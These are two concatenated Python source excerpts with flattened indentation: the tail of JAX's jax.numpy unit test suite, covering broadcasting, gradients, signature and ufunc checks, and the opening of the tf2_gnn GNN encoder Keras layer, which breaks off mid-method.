@unittest.skip("Test fails on CI, perhaps due to JIT caching")
def testDisableNumpyRankPromotionBroadcastingDecorator(self):
with jax.numpy_rank_promotion("allow"):
jnp.ones(2) + jnp.ones((1, 2)) # works just fine
with jax.numpy_rank_promotion("raise"):
self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
with jax.numpy_rank_promotion("warn"):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
jnp.ones(2) + jnp.ones((1, 2))
assert len(w) > 0
msg = str(w[-1].message)
expected_msg = ("Following NumPy automatic rank promotion for add on "
"shapes (2,) (1, 2).")
self.assertEqual(msg[:len(expected_msg)], expected_msg)
prev_len = len(w)
jnp.ones(2) + 3
self.assertEqual(len(w), prev_len) # don't want to warn for scalars
def testStackArrayArgument(self):
# tests https://github.com/google/jax/issues/1271
@api.jit
def foo(x):
return jnp.stack(x)
foo(np.zeros(2)) # doesn't crash
@api.jit
def foo(x):
return jnp.concatenate(x)
foo(np.zeros((2, 2))) # doesn't crash
def testReluGradientConstants(self):
# This is a regression test that verifies that constants associated with the
# gradient of np.maximum (from lax._balanced_eq) aren't hoisted into the
# outermost jaxpr. This was producing some large materialized constants for
# every relu activation in a model.
def body(i, xy):
x, y = xy
y = y + jax.grad(lambda z: jnp.sum(jnp.maximum(z, 0.)))(x)
return x, y
f = lambda y: lax.fori_loop(0, 5, body, (y, y))
jaxpr = jax.make_jaxpr(f)(np.zeros((3, 4), np.float32))
self.assertFalse(
any(np.array_equal(x, np.full((3, 4), 2., dtype=np.float32))
for x in jaxpr.consts))
@parameterized.named_parameters(
{"testcase_name": "_from={}_to={}".format(from_shape, to_shape),
"from_shape": from_shape, "to_shape": to_shape}
for from_shape, to_shape in [
[(1, 3), (4, 3)],
[(3,), (2, 1, 3)],
[(3,), (3, 3)],
[(1,), (3,)],
[(1,), 3],
])
def testBroadcastTo(self, from_shape, to_shape):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [from_shape], [np.float32])
np_op = lambda x: np.broadcast_to(x, to_shape)
jnp_op = lambda x: jnp.broadcast_to(x, to_shape)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker)
self._CompileAndCheck(jnp_op, args_maker)
@parameterized.named_parameters(
{"testcase_name": f"_{shapes}", "shapes": shapes, "broadcasted_shape": broadcasted_shape}
for shapes, broadcasted_shape in [
[[], ()],
[[()], ()],
[[(1, 3), (4, 3)], (4, 3)],
[[(3,), (2, 1, 3)], (2, 1, 3)],
[[(3,), (3, 3)], (3, 3)],
[[(1,), (3,)], (3,)],
[[(1,), 3], (3,)],
[[(6, 7), (5, 6, 1), (7,), (5, 1, 7)], (5, 6, 7)],
[[[1], [0, 1]], (0, 1)],
[[(1,), np.array([0, 1])], (0, 1)],
])
def testBroadcastShapes(self, shapes, broadcasted_shape):
# Test against np.broadcast_shapes once numpy 1.20 is minimum required version
np.testing.assert_equal(jnp.broadcast_shapes(*shapes), broadcasted_shape)
def testBroadcastToIssue1522(self):
self.assertRaisesRegex(
ValueError, "Incompatible shapes for broadcasting: .*",
lambda: jnp.broadcast_to(np.ones((2, 3)), (1, 3)))
def testBroadcastToIntIssue1548(self):
self.assertAllClose(jnp.broadcast_to(1, (3, 2)), np.ones((3, 2)),
check_dtypes=False)
def testBroadcastToOnScalar(self):
self.assertIsInstance(jnp.broadcast_to(10.0, ()), jnp.ndarray)
self.assertIsInstance(np.broadcast_to(10.0, ()), np.ndarray)
def testPrecision(self):
ones_1d = np.ones((2,))
ones_2d = np.ones((2, 2))
ones_3d = np.ones((2, 2, 2))
HIGHEST = lax.Precision.HIGHEST
jtu.assert_dot_precision(None, jnp.dot, ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.dot, precision=HIGHEST),
ones_3d, ones_3d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.matmul, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.vdot, precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=2, precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=(0, 0), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.tensordot, axes=((0,), (0,)), precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'i,i', precision=HIGHEST),
ones_1d, ones_1d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.einsum, 'ij,ij', precision=HIGHEST),
ones_2d, ones_2d)
jtu.assert_dot_precision(
HIGHEST,
partial(jnp.inner, precision=HIGHEST),
ones_1d, ones_1d)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shape={}_varargs={} axis={}_dtype={}".format(
shape, varargs, axis, dtype),
"shape": shape, "varargs": varargs, "axis": axis, "dtype": dtype}
for shape in [(10,), (10, 15), (10, 15, 20)]
for _num_axes in range(len(shape))
for varargs in itertools.combinations(range(1, len(shape) + 1), _num_axes)
for axis in itertools.combinations(range(len(shape)), _num_axes)
for dtype in inexact_dtypes))
def testGradient(self, shape, varargs, axis, dtype):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
jnp_fun = lambda y: jnp.gradient(y, *varargs, axis=axis)
np_fun = lambda y: np.gradient(y, *varargs, axis=axis)
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False)
self._CompileAndCheck(jnp_fun, args_maker)
def testZerosShapeErrors(self):
# see https://github.com/google/jax/issues/1822
self.assertRaisesRegex(
TypeError,
"Shapes must be 1D sequences of concrete values of integer type.*",
lambda: jnp.zeros(1.))
self.assertRaisesRegex(
TypeError,
r"Shapes must be 1D sequences of concrete values of integer type.*\n"
"If using `jit`, try using `static_argnums` or applying `jit` to smaller subfunctions.",
lambda: api.jit(jnp.zeros)(2))
def testTraceMethod(self):
x = self.rng().randn(3, 4).astype(jnp.float_)
self.assertAllClose(x.trace(), jnp.array(x).trace())
self.assertAllClose(x.trace(), api.jit(lambda y: y.trace())(x))
def testIntegerPowersArePrecise(self):
# See https://github.com/google/jax/pull/3036
# Checks if the squares of float32 integers have no numerical errors.
# It should be satisfied with all integers less than sqrt(2**24).
x = jnp.arange(-2**12, 2**12, dtype=jnp.int32)
np.testing.assert_array_equal(jnp.square(x.astype(jnp.float32)), x * x)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 2, x * x)
# Similarly for cubes.
x = jnp.arange(-2**8, 2**8, dtype=jnp.int32)
np.testing.assert_array_equal(x.astype(jnp.float32) ** 3, x * x * x)
x = np.arange(10, dtype=np.float32)
for i in range(10):
self.assertAllClose(x.astype(jnp.float32) ** i, x ** i,
check_dtypes=False)
def testToBytes(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
for order in ['C', 'F']:
self.assertEqual(jnp.asarray(v).tobytes(order), v.tobytes(order))
def testToList(self):
v = np.arange(12, dtype=np.int32).reshape(3, 4)
self.assertEqual(jnp.asarray(v).tolist(), v.tolist())
def testReductionWithRepeatedAxisError(self):
with self.assertRaisesRegex(ValueError, r"duplicate value in 'axis': \(0, 0\)"):
jnp.sum(jnp.arange(3), (0, 0))
def testArangeConcretizationError(self):
msg = r"It arose in jax.numpy.arange argument `{}`".format
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(jnp.arange)(3)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('start')):
jax.jit(lambda start: jnp.arange(start, 3))(0)
with self.assertRaisesRegex(jax.core.ConcretizationTypeError, msg('stop')):
jax.jit(lambda stop: jnp.arange(0, stop))(3)
def testIssue2347(self):
# https://github.com/google/jax/issues/2347
object_list = List[Tuple[jnp.array, float, float, jnp.array, bool]]
self.assertRaises(TypeError, jnp.array, object_list)
np_object_list = np.array(object_list)
self.assertRaises(TypeError, jnp.array, np_object_list)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogaddexpComplex(self, shapes, dtypes):
@jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
def np_op(x1, x2):
return np.log(np.exp(x1) + np.exp(x2))
rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
if jtu.device_under_test() == 'tpu':
tol = {np.complex64: 1e-3, np.complex128: 1e-10}
else:
tol = {np.complex64: 1e-5, np.complex128: 1e-14}
self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp, args_maker, tol=tol)
self._CompileAndCheck(jnp.logaddexp, args_maker, rtol=tol, atol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, dtypes),
"shapes": shapes, "dtypes": dtypes}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(all_shapes, 2))
for dtypes in itertools.product(
*(_valid_dtypes_for_shape(s, complex_dtypes) for s in shapes))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogaddexp2Complex(self, shapes, dtypes):
@jtu.ignore_warning(category=RuntimeWarning, message="invalid value.*")
def np_op(x1, x2):
return np.log2(np.exp2(x1) + np.exp2(x2))
rng = jtu.rand_some_nan(self.rng())
args_maker = lambda: tuple(rng(shape, dtype) for shape, dtype in zip(shapes, dtypes))
if jtu.device_under_test() == 'tpu':
tol = {np.complex64: 1e-3, np.complex128: 1e-10}
else:
tol = {np.complex64: 1e-5, np.complex128: 1e-14}
self._CheckAgainstNumpy(_promote_like_jnp(np_op), jnp.logaddexp2, args_maker, tol=tol)
self._CompileAndCheck(jnp.logaddexp2, args_maker, rtol=tol, atol=tol)
# Most grad tests are at the lax level (see lax_test.py), but we add some here
# as needed for e.g. particular compound ops of interest.
GradTestSpec = collections.namedtuple(
"GradTestSpec",
["op", "nargs", "order", "rng_factory", "dtypes", "name", "tol"])
def grad_test_spec(op, nargs, order, rng_factory, dtypes, name=None, tol=None):
return GradTestSpec(
op, nargs, order, rng_factory, dtypes, name or op.__name__, tol)
GRAD_TEST_RECORDS = [
grad_test_spec(jnp.arcsinh, nargs=1, order=2,
rng_factory=jtu.rand_positive,
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.arccosh, nargs=1, order=2,
rng_factory=jtu.rand_positive,
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.arctanh, nargs=1, order=2,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64, np.complex64],
tol={np.complex64: 2e-2}),
grad_test_spec(jnp.logaddexp, nargs=2, order=1,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64], tol=1e-4),
grad_test_spec(jnp.logaddexp2, nargs=2, order=2,
rng_factory=partial(jtu.rand_uniform, low=-0.9, high=0.9),
dtypes=[np.float64], tol=1e-4),
]
GradSpecialValuesTestSpec = collections.namedtuple(
"GradSpecialValuesTestSpec", ["op", "values", "order"])
GRAD_SPECIAL_VALUE_TEST_RECORDS = [
GradSpecialValuesTestSpec(jnp.arcsinh, [0., 1000.], 2),
GradSpecialValuesTestSpec(jnp.arccosh, [1000.], 2),
GradSpecialValuesTestSpec(jnp.arctanh, [0.], 2),
GradSpecialValuesTestSpec(jnp.sinc, [0.], 1),
]
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyGradTests(jtu.JaxTestCase):
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(
rec.name, shapes, itertools.repeat(dtype)),
"op": rec.op, "rng_factory": rec.rng_factory, "shapes": shapes, "dtype": dtype,
"order": rec.order, "tol": rec.tol}
for shapes in itertools.combinations_with_replacement(nonempty_shapes, rec.nargs)
for dtype in rec.dtypes)
for rec in GRAD_TEST_RECORDS))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testOpGrad(self, op, rng_factory, shapes, dtype, order, tol):
rng = rng_factory(self.rng())
tol = jtu.join_tolerance(tol, {np.float32: 1e-1, np.float64: 1e-3,
np.complex64: 1e-1, np.complex128: 1e-3})
args = tuple(rng(shape, dtype) for shape in shapes)
check_grads(op, args, order, ["fwd", "rev"], tol, tol)
@parameterized.named_parameters(itertools.chain.from_iterable(
jtu.cases_from_list(
{"testcase_name": "_{}_{}".format(rec.op.__name__, special_value),
"op": rec.op, "special_value": special_value, "order": rec.order}
for special_value in rec.values)
for rec in GRAD_SPECIAL_VALUE_TEST_RECORDS))
def testOpGradSpecialValue(self, op, special_value, order):
check_grads(op, (special_value,), order, ["fwd", "rev"],
atol={np.float32: 3e-3})
def testSincAtZero(self):
# Some manual tests for sinc at zero, since it doesn't have well-behaved
# numerical derivatives at zero
def deriv(f):
return lambda x: api.jvp(f, (x,), (1.,))[1]
def apply_all(fns, x):
for f in fns:
x = f(x)
return x
d1 = 0.
for ops in itertools.combinations_with_replacement([deriv, api.grad], 1):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d1)
d2 = -np.pi ** 2 / 3
for ops in itertools.combinations_with_replacement([deriv, api.grad], 2):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d2)
d3 = 0.
for ops in itertools.combinations_with_replacement([deriv, api.grad], 3):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d3)
d4 = np.pi ** 4 / 5
for ops in itertools.combinations_with_replacement([deriv, api.grad], 4):
self.assertAllClose(apply_all(ops, jnp.sinc)(0.), d4)
def testSincGradArrayInput(self):
# tests for a bug almost introduced in #5077
jax.grad(lambda x: jnp.sinc(x).sum())(jnp.arange(10.)) # doesn't crash
def testTakeAlongAxisIssue1521(self):
# https://github.com/google/jax/issues/1521
idx = jnp.repeat(jnp.arange(3), 10).reshape((30, 1))
def f(x):
y = x * jnp.arange(3.).reshape((1, 3))
return jnp.take_along_axis(y, idx, -1).sum()
check_grads(f, (1.,), order=1)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
"shapes": shapes, "dtype": dtype}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_shapes, 2))
for dtype in (np.complex128, )))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGradLogaddexpComplex(self, shapes, dtype):
rng = jtu.rand_default(self.rng())
args = tuple(rng(shape, dtype) for shape in shapes)
if jtu.device_under_test() == "tpu":
tol = 5e-2
else:
tol = 3e-2
check_grads(jnp.logaddexp, args, 1, ["fwd", "rev"], tol, tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix("", shapes, itertools.repeat(dtype)),
"shapes": shapes, "dtype": dtype}
for shapes in filter(
_shapes_are_broadcast_compatible,
itertools.combinations_with_replacement(nonempty_shapes, 2))
for dtype in (np.complex128, )))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGradLogaddexp2Complex(self, shapes, dtype):
rng = jtu.rand_default(self.rng())
args = tuple(rng(shape, dtype) for shape in shapes)
if jtu.device_under_test() == "tpu":
tol = 5e-2
else:
tol = 3e-2
check_grads(jnp.logaddexp2, args, 1, ["fwd", "rev"], tol, tol)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpySignaturesTest(jtu.JaxTestCase):
def testWrappedSignaturesMatch(self):
"""Test that jax.numpy function signatures match numpy."""
jnp_funcs = {name: getattr(jnp, name) for name in dir(jnp)}
func_pairs = {name: (fun, fun.__np_wrapped__) for name, fun in jnp_funcs.items()
if hasattr(fun, '__np_wrapped__')}
assert len(func_pairs) > 0
# TODO(jakevdp): fix some of the following signatures. Some are due to wrong argument names.
unsupported_params = {
'angle': ['deg'],
'asarray': ['like'],
'broadcast_to': ['subok', 'array'],
'clip': ['kwargs'],
'corrcoef': ['ddof', 'bias', 'dtype'],
'cov': ['dtype'],
'empty_like': ['subok', 'order'],
'einsum': ['kwargs'],
'einsum_path': ['einsum_call'],
'eye': ['order', 'like'],
'identity': ['like'],
'full': ['order', 'like'],
'full_like': ['subok', 'order'],
'histogram': ['normed'],
'histogram2d': ['normed'],
'histogramdd': ['normed'],
'ones': ['order', 'like'],
'ones_like': ['subok', 'order'],
'tri': ['like'],
'unwrap': ['period'],
'zeros_like': ['subok', 'order']
}
extra_params = {
'broadcast_to': ['arr'],
'einsum': ['precision'],
'einsum_path': ['subscripts'],
}
mismatches = {}
for name, (jnp_fun, np_fun) in func_pairs.items():
# broadcast_shapes is not available in numpy < 1.20
if numpy_version < (1, 20) and name == "broadcast_shapes":
continue
# Some signatures have changed; skip for older numpy versions.
if numpy_version < (1, 19) and name in ['einsum_path', 'gradient', 'isscalar']:
continue
# Note: can't use inspect.getfullargspec due to numpy issue
# https://github.com/numpy/numpy/issues/12225
try:
np_params = inspect.signature(np_fun).parameters
except ValueError:
# Some functions cannot be inspected
continue
jnp_params = inspect.signature(jnp_fun).parameters
extra = set(extra_params.get(name, []))
unsupported = set(unsupported_params.get(name, []))
# Checks to prevent tests from becoming out-of-date. If these fail,
# it means that extra_params or unsupported_params need to be updated.
assert extra.issubset(jnp_params), f"{name}: extra={extra} is not a subset of jnp_params={set(jnp_params)}."
assert not unsupported.intersection(jnp_params), f"{name}: unsupported={unsupported} overlaps with jnp_params={set(jnp_params)}."
# Skip functions that only have *args and **kwargs; we can't introspect these further.
var_args = (inspect.Parameter.VAR_POSITIONAL, inspect.Parameter.VAR_KEYWORD)
if all(p.kind in var_args for p in jnp_params.values()):
continue
if all(p.kind in var_args for p in np_params.values()):
continue
# Remove known extra parameters.
jnp_params = {a: p for a, p in jnp_params.items() if a not in extra}
# Remove known unsupported parameters.
np_params = {a: p for a, p in np_params.items() if a not in unsupported}
# Older versions of numpy may have fewer parameters; to avoid extraneous errors on older numpy
# versions, we allow for jnp to have more parameters.
if list(jnp_params)[:len(np_params)] != list(np_params):
mismatches[name] = {'np_params': list(np_params), 'jnp_params': list(jnp_params)}
self.assertEqual(mismatches, {})
_all_dtypes: List[str] = [
"bool_",
"uint8", "uint16", "uint32", "uint64",
"int8", "int16", "int32", "int64",
"float16", "float32", "float64",
"complex64", "complex128",
]
def _all_numpy_ufuncs() -> Iterator[str]:
"""Generate the names of all ufuncs in the top-level numpy namespace."""
for name in dir(np):
f = getattr(np, name)
if isinstance(f, np.ufunc):
yield name
def _dtypes_for_ufunc(name: str) -> Iterator[Tuple[str, ...]]:
"""Generate valid dtypes of inputs to the given numpy ufunc."""
func = getattr(np, name)
for arg_dtypes in itertools.product(_all_dtypes, repeat=func.nin):
args = (np.ones(1, dtype=dtype) for dtype in arg_dtypes)
try:
with warnings.catch_warnings():
warnings.filterwarnings("ignore", "divide by zero", RuntimeWarning)
_ = func(*args)
except TypeError:
pass
else:
yield arg_dtypes
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyUfuncTests(jtu.JaxTestCase):
@parameterized.named_parameters(
{"testcase_name": f"_{name}_{','.join(arg_dtypes)}",
"name": name, "arg_dtypes": arg_dtypes}
for name in _all_numpy_ufuncs()
for arg_dtypes in jtu.cases_from_list(_dtypes_for_ufunc(name)))
def testUfuncInputTypes(self, name, arg_dtypes):
# TODO(jakevdp): fix following failures and remove from this exception list.
if (name in ['divmod', 'floor_divide', 'fmod', 'gcd', 'left_shift', 'mod',
'power', 'remainder', 'right_shift', 'rint', 'square']
and 'bool_' in arg_dtypes):
self.skipTest(f"jax.numpy does not support {name}{tuple(arg_dtypes)}")
if name == 'arctanh' and jnp.issubdtype(arg_dtypes[0], jnp.complexfloating):
self.skipTest("np.arctanh & jnp.arctanh have mismatched NaNs for complex input.")
for dtype in arg_dtypes:
jtu.skip_if_unsupported_type(dtype)
jnp_op = getattr(jnp, name)
np_op = getattr(np, name)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
args_maker = lambda: tuple(np.ones(1, dtype=dtype) for dtype in arg_dtypes)
try:
jnp_op(*args_maker())
except NotImplementedError:
self.skipTest(f"jtu.{name} is not yet implemented.")
# large tol comes from the fact that numpy returns float16 in places
# that jnp returns float32. e.g. np.cos(np.uint8(0))
self._CheckAgainstNumpy(np_op, jnp_op, args_maker, check_dtypes=False, tol=1E-2)
@jtu.with_config(jax_numpy_rank_promotion="raise")
class NumpyDocTests(jtu.JaxTestCase):
def test_lax_numpy_docstrings(self):
# Test that docstring wrapping & transformation didn't fail.
# Functions that have their own docstrings & don't wrap numpy.
known_exceptions = {'broadcast_arrays', 'vectorize'}
for name in dir(jnp):
if name in known_exceptions or name.startswith('_'):
continue
# We only check signatures of functions.
obj = getattr(jnp, name)
if isinstance(obj, type) or not callable(obj):
continue
# Some jnp functions are imported from numpy or jax.dtypes directly.
if any(obj is getattr(mod, obj.__name__, None) for mod in [np, dtypes]):
continue
wrapped_fun = obj.__np_wrapped__
# If the wrapped function has a docstring, obj should too
if wrapped_fun.__doc__ and not obj.__doc__:
raise Exception(f"jnp.{name} does not contain wrapped docstring.")
if obj.__doc__ and "*Original docstring below.*" not in obj.__doc__:
raise Exception(f"jnp.{name} does not have a wrapped docstring.")
def test_parse_numpydoc(self):
# Unit test ensuring that _parse_numpydoc correctly parses docstrings for all
# functions in NumPy's top-level namespace.
section_titles = {'Attributes', 'Examples', 'Notes',
'Parameters', 'Raises', 'References',
'Returns', 'See also', 'See Also', 'Warnings', 'Warns'}
headings = [title + '\n' + '-'*len(title) for title in section_titles]
for name in dir(np):
if name.startswith('_'):
continue
obj = getattr(np, name)
if isinstance(obj, type):
continue
if not callable(obj):
continue
if 'built-in function' in repr(obj):
continue
parsed = _parse_numpydoc(obj.__doc__)
# Check that no docstring is handled gracefully.
if not obj.__doc__:
self.assertEqual(parsed, ParsedDoc(obj.__doc__))
continue
# Check that no unexpected section names are found.
extra_keys = parsed.sections.keys() - section_titles
if extra_keys:
raise ValueError(f"Extra section headers found in np.{name}: {extra_keys}")
# Check that every docstring has a summary.
if not parsed.summary:
raise ValueError(f"No summary found for np.{name}")
# Check that no expected headings are missed.
for heading in headings:
assert heading not in parsed.front_matter
if __name__ == "__main__":
absltest.main(testLoader=jtu.JaxTestLoader())
|
"""GNN Encoder class."""
from itertools import count
from typing import Any, Dict, NamedTuple, List, Tuple, Optional
import tensorflow as tf
from dpu_utils.tf2utils import MLP
from tf2_gnn.utils.param_helpers import get_activation_function
from .message_passing import (
MessagePassing,
MessagePassingInput,
get_message_passing_class,
)
from .graph_global_exchange import (
GraphGlobalExchangeInput,
GraphGlobalExchange,
GraphGlobalMeanExchange,
GraphGlobalGRUExchange,
GraphGlobalMLPExchange,
)
from .nodes_to_graph_representation import (
WeightedSumGraphRepresentation,
NodesToGraphRepresentationInput,
)
class GNNInput(NamedTuple):
"""Input named tuple for the GNN."""
node_features: tf.Tensor
adjacency_lists: Tuple[tf.Tensor, ...]
node_to_graph_map: tf.Tensor
num_graphs: tf.Tensor
class GNN(tf.keras.layers.Layer):
"""Encode graph states using a combination of graph message passing layers and dense layers
Example usage:
>>> layer_input = GNNInput(
... node_features = tf.random.normal(shape=(5, 3)),
... adjacency_lists = (
... tf.constant([[0, 1], [1, 2], [3, 4]], dtype=tf.int32),
... tf.constant([[1, 2], [3, 4]], dtype=tf.int32),
... tf.constant([[2, 0]], dtype=tf.int32)
... ),
... node_to_graph_map = tf.fill(dims=(5,), value=0),
... num_graphs = 1,
... )
...
>>> params = GNN.get_default_hyperparameters()
>>> params["hidden_dim"] = 12
>>> layer = GNN(params)
>>> output = layer(layer_input)
>>> print(output)
tf.Tensor(..., shape=(5, 12), dtype=float32)
"""
@classmethod
def get_default_hyperparameters(cls, mp_style: Optional[str] = None) -> Dict[str, Any]:
"""Get the default hyperparameter dictionary for the class."""
these_hypers = {
"message_calculation_class": "rgcn",
"initial_node_representation_activation": "tanh",
"dense_intermediate_layer_activation": "tanh",
"num_layers": 4,
"dense_every_num_layers": 2,
"residual_every_num_layers": 2,
"use_inter_layer_layernorm": False,
"hidden_dim": 16,
"layer_input_dropout_rate": 0.0,
"global_exchange_mode": "gru", # One of "mean", "mlp", "gru"
"global_exchange_every_num_layers": 2,
"global_exchange_weighting_fun": "softmax", # One of "softmax", "sigmoid"
"global_exchange_num_heads": 4,
"global_exchange_dropout_rate": 0.2,
} # type: Dict[str, Any]
if mp_style is not None:
these_hypers["message_calculation_class"] = mp_style
message_passing_class = get_message_passing_class(
these_hypers["message_calculation_class"]
)
message_passing_hypers = message_passing_class.get_default_hyperparameters()
message_passing_hypers.update(these_hypers)
return message_passing_hypers
def __init__(self, params: Dict[str, Any]):
"""Initialise the layer."""
super().__init__()
self._params = params
self._hidden_dim = params["hidden_dim"]
self._num_layers = params["num_layers"]
self._dense_every_num_layers = params["dense_every_num_layers"]
self._residual_every_num_layers = params["residual_every_num_layers"]
self._use_inter_layer_layernorm = params["use_inter_layer_layernorm"]
self._initial_node_representation_activation_fn = get_activation_function(
params["initial_node_representation_activation"]
)
self._dense_intermediate_layer_activation_fn = get_activation_function(
params["dense_intermediate_layer_activation"]
)
self._message_passing_class = get_message_passing_class(
params["message_calculation_class"]
)
if not params["global_exchange_mode"].lower() in {"mean", "mlp", "gru"}:
raise ValueError(
f"Unknown global_exchange_mode mode {params["global_exchange_mode"]} - has to be one of 'mean', 'mlp', 'gru'!"
)
self._global_exchange_mode = params["global_exchange_mode"]
self._global_exchange_every_num_layers = params["global_exchange_every_num_layers"]
self._global_exchange_weighting_fun = params["global_exchange_weighting_fun"]
self._global_exchange_num_heads = params["global_exchange_num_heads"]
self._global_exchange_dropout_rate = params["global_exchange_dropout_rate"]
# Layer member variables. To be filled in in the `build` method.
self._initial_projection_layer: tf.keras.layers.Layer = None
self._mp_layers: List[MessagePassing] = []
self._inter_layer_layernorms: List[tf.keras.layers.Layer] = []
self._dense_layers: Dict[str, tf.keras.layers.Layer] = {}
self._global_exchange_layers: Dict[str, GraphGlobalExchange] = {}
def build(self, tensor_shapes: GNNInput):
"""Build the various layers in the model.
Args:
tensor_shapes: A GNNInput of tensor shapes.
Returns:
Nothing, but initialises the layers in the model based on the tensor shapes given.
"""
# First, we go through the input shapes and make sure that anything which might vary batch
# to batch (number of nodes / number of edges) is set to None.
initial_node_features_shape: tf.TensorShape = tensor_shapes.node_features
variable_node_features_shape = tf.TensorShape((None, initial_node_features_shape[1]))
adjacency_list_shapes = tensor_shapes.adjacency_lists
embedded_shape = tf.TensorShape((None, self._hidden_dim))
with tf.name_scope(f"{self._message_passing_class.__name__}_GNN"):
# Then we construct the layers themselves:
with tf.name_scope("gnn_initial_node_projection"):
self._initial_projection_layer = tf.keras.layers.Dense(
units=self._hidden_dim,
use_bias=False,
activation=self._initial_node_representation_activation_fn,
)
self._initial_projection_layer.build(variable_node_features_shape)
# Construct the graph message passing layers.
for layer_idx in range(self._num_layers):
with tf.name_scope(f"Layer_{layer_idx}"):
with tf.name_scope("MessagePassing"):
self._mp_layers.append(
self._message_passing_class(self._params)
)
self._mp_layers[-1].build(
MessagePassingInput(embedded_shape, adjacency_list_shapes)
)
# If required, prepare for a LayerNorm:
if self._use_inter_layer_layernorm:
with tf.name_scope(f"LayerNorm"):
self._inter_layer_layernorms.append(
tf.keras.layers.LayerNormalization()
)
self._inter_layer_layernorms[-1].build(embedded_shape)
# Construct the per-node dense layers.
if layer_idx % self._dense_every_num_layers == 0:
with tf.name_scope(f"Dense"):
self._dense_layers[str(layer_idx)] = tf.keras.layers.Dense(
units=self._hidden_dim,
use_bias=False,
activation=self._dense_intermediate_layer_activation_fn,
)
self._dense_layers[str(layer_idx)].build(embedded_shape)
if (
layer_idx
and layer_idx % self._global_exchange_every_num_layers == 0
):
with tf.name_scope(f"Global_Exchange"):
if self._global_exchange_mode.lower() == "mean":
exchange_layer_class = GraphGlobalMeanExchange
elif self._global_exchange_mode.lower() == "gru":
exchange_layer_class = GraphGlobalGRUExchange
elif self._global_exchange_mode.lower() == "mlp":
exchange_layer_class = GraphGlobalMLPExchange
exchange_layer = exchange_layer_class(
hidden_dim=self._hidden_dim,
weighting_fun=self._global_exchange_weighting_fun,
num_heads=self._global_exchange_num_heads,
dropout_rate=self._global_exchange_dropout_rate,
)
exchange_layer.build(
GraphGlobalExchangeInput(
node_embeddings=tf.TensorShape(
(None, self._hidden_dim)
),
node_to_graph_map=tf.TensorShape((None,)),
num_graphs=tf.TensorShape(()),
)
)
self._global_exchange_layers[
str(layer_idx)
] = exchange_layer
super().build(tensor_shapes)
call_input_spec = (
GNNInput(
node_features=tf.TensorSpec(shape=variable_node_features_shape, dtype=tf.float32),
adjacency_lists=tuple(
tf.TensorSpec(shape=(None, 2), dtype=tf.int32)
for _ in range(len(adjacency_list_shapes))
),
node_to_graph_map=tf.TensorSpec(shape=(None,), dtype=tf.int32),
num_graphs=tf.TensorSpec(shape=(), dtype=tf.int32),
),
tf.TensorSpec(shape=(), dtype=tf.bool),
)
setattr(self, "call", tf.function(func=self.call, input_signature=call_input_spec))
def call(self, inputs: GNNInput, training: bool = False):
"""
